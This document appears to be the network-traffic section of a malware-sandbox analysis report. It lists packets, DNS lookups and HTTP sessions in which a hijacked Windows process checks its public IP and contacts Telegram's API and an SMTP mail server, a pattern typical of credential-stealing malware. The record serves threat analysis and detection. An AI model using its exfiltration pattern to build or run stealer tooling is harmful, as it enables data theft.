Jul 25, 2024 10:19:41.106527090 CEST	49728	443	192.168.2.5	188.114.97.3
Jul 25, 2024 10:19:41.106545925 CEST	443	49728	188.114.97.3	192.168.2.5
Jul 25, 2024 10:19:41.127302885 CEST	80	49726	193.122.6.168	192.168.2.5
Jul 25, 2024 10:19:41.127399921 CEST	49726	80	192.168.2.5	193.122.6.168
Jul 25, 2024 10:19:41.159926891 CEST	49727	80	192.168.2.5	193.122.6.168
Jul 25, 2024 10:19:41.694689989 CEST	443	49728	188.114.97.3	192.168.2.5
Jul 25, 2024 10:19:41.697633028 CEST	49728	443	192.168.2.5	188.114.97.3
Jul 25, 2024 10:19:41.697666883 CEST	443	49728	188.114.97.3	192.168.2.5
Jul 25, 2024 10:19:41.833372116 CEST	443	49728	188.114.97.3	192.168.2.5
Jul 25, 2024 10:19:41.833650112 CEST	443	49728	188.114.97.3	192.168.2.5
Jul 25, 2024 10:19:41.833725929 CEST	49728	443	192.168.2.5	188.114.97.3
Jul 25, 2024 10:19:41.834116936 CEST	49728	443	192.168.2.5	188.114.97.3
Jul 25, 2024 10:19:41.836992025 CEST	49727	80	192.168.2.5	193.122.6.168
Jul 25, 2024 10:19:41.837934017 CEST	49729	80	192.168.2.5	193.122.6.168
Jul 25, 2024 10:19:41.845787048 CEST	80	49727	193.122.6.168	192.168.2.5
Jul 25, 2024 10:19:41.845869064 CEST	49727	80	192.168.2.5	193.122.6.168
Jul 25, 2024 10:19:41.846366882 CEST	80	49729	193.122.6.168	192.168.2.5
Jul 25, 2024 10:19:41.846451044 CEST	49729	80	192.168.2.5	193.122.6.168
Jul 25, 2024 10:19:41.846510887 CEST	49729	80	192.168.2.5	193.122.6.168
Jul 25, 2024 10:19:41.852319002 CEST	80	49729	193.122.6.168	192.168.2.5
Jul 25, 2024 10:19:44.510621071 CEST	80	49729	193.122.6.168	192.168.2.5
Jul 25, 2024 10:19:44.538825035 CEST	49730	443	192.168.2.5	149.154.167.220
Jul 25, 2024 10:19:44.538868904 CEST	443	49730	149.154.167.220	192.168.2.5
Jul 25, 2024 10:19:44.538955927 CEST	49730	443	192.168.2.5	149.154.167.220
Jul 25, 2024 10:19:44.539427996 CEST	49730	443	192.168.2.5	149.154.167.220
Jul 25, 2024 10:19:44.539442062 CEST	443	49730	149.154.167.220	192.168.2.5
Jul 25, 2024 10:19:44.566291094 CEST	49729	80	192.168.2.5	193.122.6.168
Jul 25, 2024 10:19:45.471618891 CEST	443	49730	149.154.167.220	192.168.2.5
Jul 25, 2024 10:19:45.471757889 CEST	49730	443	192.168.2.5	149.154.167.220
Jul 25, 2024 10:19:45.473615885 CEST	49730	443	192.168.2.5	149.154.167.220
Jul 25, 2024 10:19:45.473624945 CEST	443	49730	149.154.167.220	192.168.2.5
Jul 25, 2024 10:19:45.473913908 CEST	443	49730	149.154.167.220	192.168.2.5
Jul 25, 2024 10:19:45.475439072 CEST	49730	443	192.168.2.5	149.154.167.220
Jul 25, 2024 10:19:45.520509005 CEST	443	49730	149.154.167.220	192.168.2.5
Jul 25, 2024 10:19:45.781063080 CEST	443	49730	149.154.167.220	192.168.2.5
Jul 25, 2024 10:19:45.781156063 CEST	443	49730	149.154.167.220	192.168.2.5
Jul 25, 2024 10:19:45.781218052 CEST	49730	443	192.168.2.5	149.154.167.220
Jul 25, 2024 10:19:45.781682014 CEST	49730	443	192.168.2.5	149.154.167.220
Jul 25, 2024 10:19:51.367502928 CEST	49717	80	192.168.2.5	193.122.6.168
Jul 25, 2024 10:19:51.567926884 CEST	49729	80	192.168.2.5	193.122.6.168
Jul 25, 2024 10:19:51.592564106 CEST	80	49729	193.122.6.168	192.168.2.5
Jul 25, 2024 10:19:51.592658997 CEST	49729	80	192.168.2.5	193.122.6.168
Jul 25, 2024 10:19:52.143423080 CEST	49731	587	192.168.2.5	192.185.142.133
Jul 25, 2024 10:19:52.151015043 CEST	587	49731	192.185.142.133	192.168.2.5
Jul 25, 2024 10:19:52.151118040 CEST	49731	587	192.168.2.5	192.185.142.133
Jul 25, 2024 10:19:52.726114035 CEST	587	49731	192.185.142.133	192.168.2.5
Jul 25, 2024 10:19:52.726321936 CEST	49731	587	192.168.2.5	192.185.142.133
Jul 25, 2024 10:19:52.735675097 CEST	587	49731	192.185.142.133	192.168.2.5
Jul 25, 2024 10:19:52.842161894 CEST	587	49731	192.185.142.133	192.168.2.5
Jul 25, 2024 10:19:52.842478037 CEST	49731	587	192.168.2.5	192.185.142.133
Jul 25, 2024 10:19:52.870217085 CEST	587	49731	192.185.142.133	192.168.2.5
Jul 25, 2024 10:19:53.166218996 CEST	587	49731	192.185.142.133	192.168.2.5
Jul 25, 2024 10:19:53.166698933 CEST	49731	587	192.168.2.5	192.185.142.133
Jul 25, 2024 10:19:53.179390907 CEST	587	49731	192.185.142.133	192.168.2.5
Jul 25, 2024 10:19:53.298171043 CEST	587	49731	192.185.142.133	192.168.2.5
Jul 25, 2024 10:19:53.298209906 CEST	587	49731	192.185.142.133	192.168.2.5
Jul 25, 2024 10:19:53.298227072 CEST	587	49731	192.185.142.133	192.168.2.5
Jul 25, 2024 10:19:53.298261881 CEST	49731	587	192.168.2.5	192.185.142.133
Jul 25, 2024 10:19:53.298664093 CEST	587	49731	192.185.142.133	192.168.2.5
Jul 25, 2024 10:19:53.298711061 CEST	49731	587	192.168.2.5	192.185.142.133
Jul 25, 2024 10:19:53.320178032 CEST	49731	587	192.168.2.5	192.185.142.133
Jul 25, 2024 10:19:53.336886883 CEST	587	49731	192.185.142.133	192.168.2.5
Jul 25, 2024 10:19:53.434607983 CEST	587	49731	192.185.142.133	192.168.2.5
Jul 25, 2024 10:19:53.438149929 CEST	49731	587	192.168.2.5	192.185.142.133
Jul 25, 2024 10:19:53.443583012 CEST	587	49731	192.185.142.133	192.168.2.5
Jul 25, 2024 10:19:53.553738117 CEST	587	49731	192.185.142.133	192.168.2.5
Jul 25, 2024 10:19:53.554244995 CEST	49731	587	192.168.2.5	192.185.142.133
Jul 25, 2024 10:19:53.559259892 CEST	587	49731	192.185.142.133	192.168.2.5
Jul 25, 2024 10:19:53.682188034 CEST	587	49731	192.185.142.133	192.168.2.5
Jul 25, 2024 10:19:53.682612896 CEST	49731	587	192.168.2.5	192.185.142.133
Jul 25, 2024 10:19:53.690691948 CEST	587	49731	192.185.142.133	192.168.2.5
Jul 25, 2024 10:19:53.908278942 CEST	587	49731	192.185.142.133	192.168.2.5
Jul 25, 2024 10:19:53.908521891 CEST	49731	587	192.168.2.5	192.185.142.133
Jul 25, 2024 10:19:53.914702892 CEST	587	49731	192.185.142.133	192.168.2.5
Jul 25, 2024 10:19:54.024465084 CEST	587	49731	192.185.142.133	192.168.2.5
Jul 25, 2024 10:19:54.024769068 CEST	49731	587	192.168.2.5	192.185.142.133
Jul 25, 2024 10:19:54.030859947 CEST	587	49731	192.185.142.133	192.168.2.5
Jul 25, 2024 10:19:54.226881027 CEST	587	49731	192.185.142.133	192.168.2.5
Jul 25, 2024 10:19:54.227101088 CEST	49731	587	192.168.2.5	192.185.142.133
Jul 25, 2024 10:19:54.234512091 CEST	587	49731	192.185.142.133	192.168.2.5
Jul 25, 2024 10:19:54.342878103 CEST	587	49731	192.185.142.133	192.168.2.5
Jul 25, 2024 10:19:54.343556881 CEST	49731	587	192.168.2.5	192.185.142.133
Jul 25, 2024 10:19:54.343612909 CEST	49731	587	192.168.2.5	192.185.142.133
Jul 25, 2024 10:19:54.343631029 CEST	49731	587	192.168.2.5	192.185.142.133
Jul 25, 2024 10:19:54.343650103 CEST	49731	587	192.168.2.5	192.185.142.133
Jul 25, 2024 10:19:54.349467039 CEST	587	49731	192.185.142.133	192.168.2.5
Jul 25, 2024 10:19:54.350353003 CEST	587	49731	192.185.142.133	192.168.2.5
Jul 25, 2024 10:19:54.460897923 CEST	587	49731	192.185.142.133	192.168.2.5
Jul 25, 2024 10:19:54.503653049 CEST	49731	587	192.168.2.5	192.185.142.133
Jul 25, 2024 10:19:55.983922958 CEST	49731	587	192.168.2.5	192.185.142.133
Jul 25, 2024 10:19:55.988909960 CEST	587	49731	192.185.142.133	192.168.2.5
Jul 25, 2024 10:19:56.097852945 CEST	587	49731	192.185.142.133	192.168.2.5
Jul 25, 2024 10:19:56.098318100 CEST	49731	587	192.168.2.5	192.185.142.133
Jul 25, 2024 10:19:56.100069046 CEST	49732	587	192.168.2.5	192.185.142.133
Jul 25, 2024 10:19:56.106550932 CEST	587	49732	192.185.142.133	192.168.2.5
Jul 25, 2024 10:19:56.106761932 CEST	49732	587	192.168.2.5	192.185.142.133
Jul 25, 2024 10:19:56.819963932 CEST	587	49732	192.185.142.133	192.168.2.5
Jul 25, 2024 10:19:56.820117950 CEST	49732	587	192.168.2.5	192.185.142.133
Jul 25, 2024 10:19:56.826703072 CEST	587	49732	192.185.142.133	192.168.2.5
Jul 25, 2024 10:19:56.935118914 CEST	587	49732	192.185.142.133	192.168.2.5
Jul 25, 2024 10:19:56.935375929 CEST	49732	587	192.168.2.5	192.185.142.133
Jul 25, 2024 10:19:56.940526009 CEST	587	49732	192.185.142.133	192.168.2.5
Jul 25, 2024 10:19:57.108762980 CEST	587	49732	192.185.142.133	192.168.2.5
Jul 25, 2024 10:19:57.109368086 CEST	49732	587	192.168.2.5	192.185.142.133
Jul 25, 2024 10:19:57.122659922 CEST	587	49732	192.185.142.133	192.168.2.5
Jul 25, 2024 10:19:57.256366014 CEST	587	49732	192.185.142.133	192.168.2.5
Jul 25, 2024 10:19:57.256652117 CEST	587	49732	192.185.142.133	192.168.2.5
Jul 25, 2024 10:19:57.256690025 CEST	587	49732	192.185.142.133	192.168.2.5
Jul 25, 2024 10:19:57.256721020 CEST	49732	587	192.168.2.5	192.185.142.133
Jul 25, 2024 10:19:57.258661985 CEST	49732	587	192.168.2.5	192.185.142.133
Jul 25, 2024 10:19:57.263679981 CEST	587	49732	192.185.142.133	192.168.2.5
Jul 25, 2024 10:19:57.560520887 CEST	587	49732	192.185.142.133	192.168.2.5
Jul 25, 2024 10:19:57.561428070 CEST	49732	587	192.168.2.5	192.185.142.133
Jul 25, 2024 10:19:57.811803102 CEST	587	49732	192.185.142.133	192.168.2.5
Jul 25, 2024 10:19:57.812490940 CEST	49732	587	192.168.2.5	192.185.142.133
Jul 25, 2024 10:19:57.812771082 CEST	587	49732	192.185.142.133	192.168.2.5
Jul 25, 2024 10:19:57.812926054 CEST	49732	587	192.168.2.5	192.185.142.133
Jul 25, 2024 10:19:57.815254927 CEST	587	49732	192.185.142.133	192.168.2.5
Jul 25, 2024 10:19:57.927472115 CEST	587	49732	192.185.142.133	192.168.2.5
Jul 25, 2024 10:19:57.927742004 CEST	49732	587	192.168.2.5	192.185.142.133
Jul 25, 2024 10:19:57.946624994 CEST	587	49732	192.185.142.133	192.168.2.5
Jul 25, 2024 10:19:58.070538998 CEST	587	49732	192.185.142.133	192.168.2.5
Jul 25, 2024 10:19:58.071000099 CEST	49732	587	192.168.2.5	192.185.142.133
Jul 25, 2024 10:19:58.076240063 CEST	587	49732	192.185.142.133	192.168.2.5
Jul 25, 2024 10:19:58.190834999 CEST	587	49732	192.185.142.133	192.168.2.5
Jul 25, 2024 10:19:58.191382885 CEST	49732	587	192.168.2.5	192.185.142.133
Jul 25, 2024 10:19:58.196234941 CEST	587	49732	192.185.142.133	192.168.2.5
Jul 25, 2024 10:19:58.622756958 CEST	587	49732	192.185.142.133	192.168.2.5
Jul 25, 2024 10:19:58.623615980 CEST	49732	587	192.168.2.5	192.185.142.133
Jul 25, 2024 10:19:58.624206066 CEST	587	49732	192.185.142.133	192.168.2.5
Jul 25, 2024 10:19:58.624511003 CEST	49732	587	192.168.2.5	192.185.142.133
Jul 25, 2024 10:19:58.629157066 CEST	587	49732	192.185.142.133	192.168.2.5
Jul 25, 2024 10:19:58.781145096 CEST	587	49732	192.185.142.133	192.168.2.5
Jul 25, 2024 10:19:58.781455994 CEST	49732	587	192.168.2.5	192.185.142.133
Jul 25, 2024 10:19:58.786509991 CEST	587	49732	192.185.142.133	192.168.2.5
Jul 25, 2024 10:19:58.896621943 CEST	587	49732	192.185.142.133	192.168.2.5
Jul 25, 2024 10:19:58.896974087 CEST	49732	587	192.168.2.5	192.185.142.133
Jul 25, 2024 10:19:58.896974087 CEST	49732	587	192.168.2.5	192.185.142.133
Jul 25, 2024 10:19:58.897020102 CEST	49732	587	192.168.2.5	192.185.142.133
Jul 25, 2024 10:19:58.897020102 CEST	49732	587	192.168.2.5	192.185.142.133
Jul 25, 2024 10:19:58.904686928 CEST	587	49732	192.185.142.133	192.168.2.5
Jul 25, 2024 10:19:58.904719114 CEST	587	49732	192.185.142.133	192.168.2.5
Jul 25, 2024 10:19:58.904747009 CEST	587	49732	192.185.142.133	192.168.2.5
Jul 25, 2024 10:19:58.904773951 CEST	587	49732	192.185.142.133	192.168.2.5
Jul 25, 2024 10:19:58.904802084 CEST	587	49732	192.185.142.133	192.168.2.5
Jul 25, 2024 10:19:59.014813900 CEST	587	49732	192.185.142.133	192.168.2.5
Jul 25, 2024 10:19:59.066422939 CEST	49732	587	192.168.2.5	192.185.142.133

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jul 25, 2024 10:19:18.441981077 CEST	55019	53	192.168.2.5	1.1.1.1
Jul 25, 2024 10:19:18.840034962 CEST	53	55019	1.1.1.1	192.168.2.5
Jul 25, 2024 10:19:20.525921106 CEST	58134	53	192.168.2.5	1.1.1.1
Jul 25, 2024 10:19:20.538589001 CEST	53	58134	1.1.1.1	192.168.2.5
Jul 25, 2024 10:19:22.953897953 CEST	52505	53	192.168.2.5	1.1.1.1
Jul 25, 2024 10:19:22.962157965 CEST	53	52505	1.1.1.1	192.168.2.5
Jul 25, 2024 10:19:44.525844097 CEST	54643	53	192.168.2.5	1.1.1.1
Jul 25, 2024 10:19:44.537656069 CEST	53	54643	1.1.1.1	192.168.2.5
Jul 25, 2024 10:19:51.569046974 CEST	59637	53	192.168.2.5	1.1.1.1
Jul 25, 2024 10:19:52.141906977 CEST	53	59637	1.1.1.1	192.168.2.5

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Jul 25, 2024 10:19:18.441981077 CEST	192.168.2.5	1.1.1.1	0xb263	Standard query (0)	www.reap.skyestates.com.mt	A (IP address)	IN (0x0001)	false
Jul 25, 2024 10:19:20.525921106 CEST	192.168.2.5	1.1.1.1	0x3ff1	Standard query (0)	checkip.dyndns.org	A (IP address)	IN (0x0001)	false
Jul 25, 2024 10:19:22.953897953 CEST	192.168.2.5	1.1.1.1	0xa086	Standard query (0)	reallyfreegeoip.org	A (IP address)	IN (0x0001)	false
Jul 25, 2024 10:19:44.525844097 CEST	192.168.2.5	1.1.1.1	0x2212	Standard query (0)	api.telegram.org	A (IP address)	IN (0x0001)	false
Jul 25, 2024 10:19:51.569046974 CEST	192.168.2.5	1.1.1.1	0x1b3b	Standard query (0)	mail.electromac.com.bo	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Jul 25, 2024 10:19:18.840034962 CEST	1.1.1.1	192.168.2.5	0xb263	No error (0)	www.reap.skyestates.com.mt		108.167.181.251	A (IP address)	IN (0x0001)	false
Jul 25, 2024 10:19:20.538589001 CEST	1.1.1.1	192.168.2.5	0x3ff1	No error (0)	checkip.dyndns.org	checkip.dyndns.com		CNAME (Canonical name)	IN (0x0001)	false
Jul 25, 2024 10:19:20.538589001 CEST	1.1.1.1	192.168.2.5	0x3ff1	No error (0)	checkip.dyndns.com		193.122.6.168	A (IP address)	IN (0x0001)	false
Jul 25, 2024 10:19:20.538589001 CEST	1.1.1.1	192.168.2.5	0x3ff1	No error (0)	checkip.dyndns.com		132.226.247.73	A (IP address)	IN (0x0001)	false
Jul 25, 2024 10:19:20.538589001 CEST	1.1.1.1	192.168.2.5	0x3ff1	No error (0)	checkip.dyndns.com		193.122.130.0	A (IP address)	IN (0x0001)	false
Jul 25, 2024 10:19:20.538589001 CEST	1.1.1.1	192.168.2.5	0x3ff1	No error (0)	checkip.dyndns.com		132.226.8.169	A (IP address)	IN (0x0001)	false
Jul 25, 2024 10:19:20.538589001 CEST	1.1.1.1	192.168.2.5	0x3ff1	No error (0)	checkip.dyndns.com		158.101.44.242	A (IP address)	IN (0x0001)	false
Jul 25, 2024 10:19:22.962157965 CEST	1.1.1.1	192.168.2.5	0xa086	No error (0)	reallyfreegeoip.org		188.114.97.3	A (IP address)	IN (0x0001)	false
Jul 25, 2024 10:19:22.962157965 CEST	1.1.1.1	192.168.2.5	0xa086	No error (0)	reallyfreegeoip.org		188.114.96.3	A (IP address)	IN (0x0001)	false
Jul 25, 2024 10:19:44.537656069 CEST	1.1.1.1	192.168.2.5	0x2212	No error (0)	api.telegram.org		149.154.167.220	A (IP address)	IN (0x0001)	false
Jul 25, 2024 10:19:52.141906977 CEST	1.1.1.1	192.168.2.5	0x1b3b	No error (0)	mail.electromac.com.bo	electromac.com.bo		CNAME (Canonical name)	IN (0x0001)	false
Jul 25, 2024 10:19:52.141906977 CEST	1.1.1.1	192.168.2.5	0x1b3b	No error (0)	electromac.com.bo		192.185.142.133	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

www.reap.skyestates.com.mt

reallyfreegeoip.org

api.telegram.org

checkip.dyndns.org

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.5	49714	193.122.6.168	80	6752	C:\Program Files (x86)\Windows Mail\wab.exe

Timestamp	Bytes transferred	Direction	Data
Jul 25, 2024 10:19:20.549671888 CEST	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Jul 25, 2024 10:19:21.213251114 CEST	320	IN	HTTP/1.1 200 OK Date: Thu, 25 Jul 2024 08:19:21 GMT Content-Type: text/html Content-Length: 103 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: 85267f8e0f6697f514ae5c7fa61a881f Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>
Jul 25, 2024 10:19:21.216943026 CEST	127	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org
Jul 25, 2024 10:19:22.409809113 CEST	320	IN	HTTP/1.1 200 OK Date: Thu, 25 Jul 2024 08:19:22 GMT Content-Type: text/html Content-Length: 103 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: 63fcfbf86dc9d1355076dac7b6cd165e Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>
Jul 25, 2024 10:19:23.579241037 CEST	127	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org
Jul 25, 2024 10:19:25.055377960 CEST	320	IN	HTTP/1.1 200 OK Date: Thu, 25 Jul 2024 08:19:24 GMT Content-Type: text/html Content-Length: 103 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: 0d71280800c733d27d7a50b4de6f7759 Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.5	49717	193.122.6.168	80	6752	C:\Program Files (x86)\Windows Mail\wab.exe

Timestamp	Bytes transferred	Direction	Data
Jul 25, 2024 10:19:25.716675043 CEST	127	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org
Jul 25, 2024 10:19:28.107654095 CEST	320	IN	HTTP/1.1 200 OK Date: Thu, 25 Jul 2024 08:19:28 GMT Content-Type: text/html Content-Length: 103 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: 359322c431076bcd6aece2a3f2ce2554 Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.5	49719	193.122.6.168	80	6752	C:\Program Files (x86)\Windows Mail\wab.exe

Timestamp	Bytes transferred	Direction	Data
Jul 25, 2024 10:19:28.747915030 CEST	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Jul 25, 2024 10:19:32.096337080 CEST	320	IN	HTTP/1.1 200 OK Date: Thu, 25 Jul 2024 08:19:31 GMT Content-Type: text/html Content-Length: 103 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: 717fd9605ba7462519596ad7de6a958d Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>
Jul 25, 2024 10:19:32.096575975 CEST	320	IN	HTTP/1.1 200 OK Date: Thu, 25 Jul 2024 08:19:31 GMT Content-Type: text/html Content-Length: 103 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: 717fd9605ba7462519596ad7de6a958d Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3	192.168.2.5	49721	193.122.6.168	80	6752	C:\Program Files (x86)\Windows Mail\wab.exe

Timestamp	Bytes transferred	Direction	Data
Jul 25, 2024 10:19:32.748121977 CEST	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Jul 25, 2024 10:19:35.551037073 CEST	320	IN	HTTP/1.1 200 OK Date: Thu, 25 Jul 2024 08:19:35 GMT Content-Type: text/html Content-Length: 103 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: b8e79f495e2a860b2e4c87e279f06d38 Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4	192.168.2.5	49724	193.122.6.168	80	6752	C:\Program Files (x86)\Windows Mail\wab.exe

Timestamp	Bytes transferred	Direction	Data
Jul 25, 2024 10:19:36.229909897 CEST	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Jul 25, 2024 10:19:36.883203030 CEST	320	IN	HTTP/1.1 200 OK Date: Thu, 25 Jul 2024 08:19:36 GMT Content-Type: text/html Content-Length: 103 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: 7db82ca62ec9be512b02cf58d6efbf6d Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5	192.168.2.5	49726	193.122.6.168	80	6752	C:\Program Files (x86)\Windows Mail\wab.exe

Timestamp	Bytes transferred	Direction	Data
Jul 25, 2024 10:19:37.677248955 CEST	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Jul 25, 2024 10:19:40.408366919 CEST	730	IN	HTTP/1.1 502 Bad Gateway Date: Thu, 25 Jul 2024 08:19:40 GMT Content-Type: text/html Content-Length: 547 Connection: keep-alive X-Request-ID: 1cd1a7a5006324a810da5b9ad1a742c2 Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 35 30 32 20 42 61 64 20 47 61 74 65 77 61 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 35 30 32 20 42 61 64 20 47 61 74 65 77 61 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 [TRUNCATED] Data Ascii: <html><head><title>502 Bad Gateway</title></head><body><center><h1>502 Bad Gateway</h1></center><hr><center></center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome 